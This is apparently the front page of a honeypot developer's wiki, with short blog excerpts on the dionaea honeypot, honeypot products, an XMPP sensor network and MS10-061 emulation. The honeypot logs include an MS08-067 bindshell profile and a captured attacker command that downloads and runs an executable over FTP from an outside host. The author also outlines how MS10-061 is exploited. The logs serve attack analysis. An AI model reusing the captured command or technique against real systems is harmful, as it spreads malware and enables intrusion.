Software at carnivore.it

dionaea

nepenthes

libemu

nebula

liblcfg


KFSensor 4.7 Trial Review

After reading Roger A. Grimes review of low interaction honeypots KFSensor, HoneyPoint and Honeyd and being surprised by the pricing scheme, I decided to test it, maybe I was missing something, and if not, I could at least double the price for dionaea.

Identifying toolkits

Attacks which are identified correctly are rather boring, failing attacks are interesting, as they provide some more information on the problem.

as seen on twitter

<jcanto> workmate: 'Django is like a cheap whore: takes some time to understand her, but then it makes lots of stuff for a little spending

As the Berlusconi in me was convinced rather instantly, I decided to give django a shot.
Current projectname is carniwwwhore, and as I know I suck in this webdev, I'm looking for people who want to participate, so this flower survives the cold season.

I basically just tested how to get things done with django, and from what I can say, jcanto's workmate is correct.
Due to my lack of love towards html and css, it looks ugly, but given the MVC and use of templates, making it look pretty should be easy for somebody who wants a pretty presentation.


Given my obvious anticipation towards html, I spent most of the time on the filters …


Printing the connections recursively was a pita, but it works …

evasion

We heard you are connected ...

Looking at 'what happened' using readlogsqltree, readlogsqltree died with an exception trying to decode the json encoded profile of a shellcode:

2010-10-20 17:33:07
  connection 496731 smbd tcp accept 93.218.66.143:445 <- 118.111.33.215:4602 (496731 None)
   dcerpc bind: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' (DSSETUP) opnum 9 (DsRolerUpgradeDownlevelServer (MS04-11))
Traceback (most recent call last):
  File "/opt/dionaea/lib/python3.1/json/decoder.py", line 341, in raw_decode
    obj, end = self.scan_once(s, idx)
StopIteration

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "./readlogsqltree.py", line 322, in <module>
    print_db(options, args)
  File "./readlogsqltree.py", line 294, in print_db
    print_profiles(cursor, c['connection'], 2)
  File "./readlogsqltree.py", line 57, in print_profiles
    ' ' * indent, json.loads(profile['emu_profile_json'])))
  File "/opt/dionaea/lib/python3.1/json/__init__.py", line 291, in loads
    return _default_decoder.decode(s)
  File "/opt/dionaea/lib/python3.1/json/decoder.py", line 325, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "/opt/dionaea/lib/python3.1/json/decoder.py", line 343, in raw_decode
    raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded

MS10-061 attacks?

I've been wondering already, why there was no worm for MS10-061, as the bug is reliable to exploit, you just upload a file and execute it, no shellcode and no language/service pack specific offsets required, in other words perfectly wormable.

Today, I think I got first traces of a automated exploitation of the bug, due too some misunderstanding with the SMB protocol, I did not receive a copy of the attacking malware, but there are some interesting details I want to share anyway.

XMPP Server

This guide explains how to install a sensor network patched prosody xmpp server on a server called “sensors.example.com”.
My prosody repository is not meant to be a 'fork' of prosody, it is just a convenience repository, so you do not have to merge patches yourself.

The patches:

  • prevent messages from visitors getting sent to visitors
  • prevent messages sent from vistors or participants getting sent to the source

This way, sensors can't read messages from other sensors (vistors), but can receive files from other sensors, in a channel where the sensor user is a participant, and the sensors never get their own messages replied from the xmpp server.

virustotal api

I've been messing with virustotal some time ago, and at that point of time you had to scape the html output. Things have changed, virustotal offers a free http api to interface with their services, all you have to do is sign up and get the api key which is hidden deep in the web2.0 interface.

Using the api, you have get_file_report, scan_file and make_comment.

alix - harddisk

As mentioned in the comments, the cf card in my alix died right after the installation, and I decided to hook up a 2.5” hard disk instead.
Getting the disk was trivial, it is a standard notebook hard disk, which can be bought almost everywhere.
Getting a 44pin ata cable to attach the disk to the alix board was a problem, after some weeks I ended up getting the cable totally overpriced on ebay due to lack of alternatives.

The harddisk *has* to be slave, even if you do not have a cf card attached, you can't have the hdd being master.

a missed file

Looking at my dionaea readlogsql logs for the last 24h I spotted this:

2010-10-02 08:57:48
  connection 479687 smbd tcp accept 10.146.168.210:445 <- 10.168.211.184:42210 (479687 None)
   dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
   profile: [{'return': '0x71a10000', 'args': ['ws2_32'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['2', '1244280'], 'call': 'WSAStartup'}, {'return': '66', 'args': ['2', '1', '0', '0', '0', '0'], 'call': 'WSASocket'}, {'return': '0', 'args': ['66', {'sin_port': '1130', 'sin_addr': {'s_addr': '0.0.0.0'}, 'sin_zero': '       ', 'sin_family': '2'}, '16'], 'call': 'bind'}, {'return': '0', 'args': ['66', '2'], 'call': 'listen'}, {'return': '68', 'args': ['66', {}, ''], 'call': 'accept'}, {'return': '0', 'args': ['66'], 'call': 'closesocket'}, {'return': '-1', 'args': ['', 'cmd', '', '', '1', '0', '', '', {'dwXCountChars': '0', 'hStdInput': '68', 'wShowWindow': '0', 'dwYSize': '0', 'lpReserved2': '0', 'cbReserved2': '0', 'cb': '0', 'dwX': '0', 'dwY': '0', 'hStdOutput': '68', 'lpDesktop': '0', 'hStdError': '68', 'dwFlags': '0', 'dwYCountChars': '0', 'lpReserved': '0', 'lpTitle': '0', 'dwXSize': '0', 'dwFillAttribute': '0'}, {'dwProcessId': '4712', 'hThread': '4712', 'dwThreadId': '4714', 'hProcess': '4711'}], 'call': 'CreateProcess'}, {'return': '0', 'args': ['4712', '-1'], 'call': 'WaitForSingleObject'}, {'return': '0', 'args': ['68'], 'call': 'closesocket'}, {'return': '0', 'args': ['2088763392'], 'call': 'ExitThread'}]
   service: bindshell://1130
    connection 479689 remoteshell tcp listen 10.152.73.113:1130 (479687 479687)
      connection 479690 remoteshell tcp accept 10.152.73.113:1130 <- 10.182.132.14:42224 (479687 479689)

A proper exploitation, a proper remote shell, but for whatever reason there was no offer …

So, I looked up the data from the shell session for 10.152.73.113:1130 ← 10.182.132.14:42224.

[02102010 08:57:52] cmd dionaea/cmd.py:52-debug: DATA: b'echo open 10.232.44.205 33542 >> asr_ltjhy &echo user ltjhyh ltjhyh >> asr_ltjhy &echo get asr_77034.exe >> asr_ltjhy &echo quit >> asr_ltjhy &ftp -nv -s:asr_ltjhy &start asr_77034.exe\r\n'

It looked valid, and I was wondering why dionaea failed to detect the offer and download the file.
So, I decided to reproduce the failure using the cli in dionaea:

dionaea emulates MS10-061

MS10-061 allows uploading a file to a remote computer using the printer service (spoolss), use the spool service to write an 'at command' to the AT service, to run a job in the future, basically run the uploaded file.

While it is not perfect yet, it basically works.
Whats missing for metasploit:

  • the WritePrinter piped ATSVC command is lost
  • the piped NetShareEnum Trans command is lost - you have to set PNAME in metasploit

But, in the end, we already get the file, which is a good start.

Thanks to Tan Kean Siong for his contribution.

Below you can see how such an attack currently looks like using readlogsqltree:

2010-09-26 20:53:37
  connection 25889 smbd tcp accept ::ffff:127.0.0.1:445 <- ::ffff:127.0.0.1:45470 (25889 None)
   dcerpc bind: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '14d8483f-8f73-fc08-3b1b-c15070355ffe' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '24b9a895-d259-b5d6-7f1c-e0196c35cb12' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '2559f952-03e3-f9b2-662b-4e6f4fbfa993' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '2815b485-8bcc-cbc6-a45c-1cca0bc8a928' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '5877c11c-b7d6-92ac-b8e6-4a016a66d521' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid '8c5c0212-2c8b-e9de-8889-19b94be5063e' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'c186c5da-bfeb-d0a3-8751-e8e50eea0004' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'cc3824ba-b733-5994-5aab-186390e18f3e' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'd0e857b9-7929-9ab0-d61b-6f64c1543512' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'e89a99e6-2782-7bc4-3fe6-1d3d1dcf4b5f' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'faf39128-da8f-234f-a9f4-9d466e2f6fc3' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'fd6e11c8-d3ad-c481-7a20-0ba79198b65e' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc bind: uuid 'fedc56ef-4c84-abd6-0f34-ac63f9d512cb' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 69 (OpenPrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 17 (StartDocPrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 23 (EndDocPrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 17 (StartDocPrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 19 (WritePrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 23 (EndDocPrinter ())
   dcerpc request: uuid '12345678-1234-abcd-ef00-0123456789ab' (spoolss) opnum 29 (ClosePrinter ())
   profile: []
   offer: spoolss://::ffff:127.0.0.1/Xhbqy5httERSXV.exe
   download: 6b07a937c7a89f30206cfdf25b8331de spoolss://::ffff:127.0.0.1

gnuplotsql

smbd overview 2010
smb protocol stats for 2010 so far

gnuplotsql.py is a script I wrote to visualize the sqlite database in a useful way.

You can browse my statistics here while you use the script to create stats for your own database:

MSSQL attacks examined

Simplified version of the world.

Given the number of attacks reported on mssql, and the data I gathered over the last weeks, I decided to have a look on it.

start.txt · Last modified: 2010/10/13 12:09 by common
chimeric.de = chi`s home Creative Commons License Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0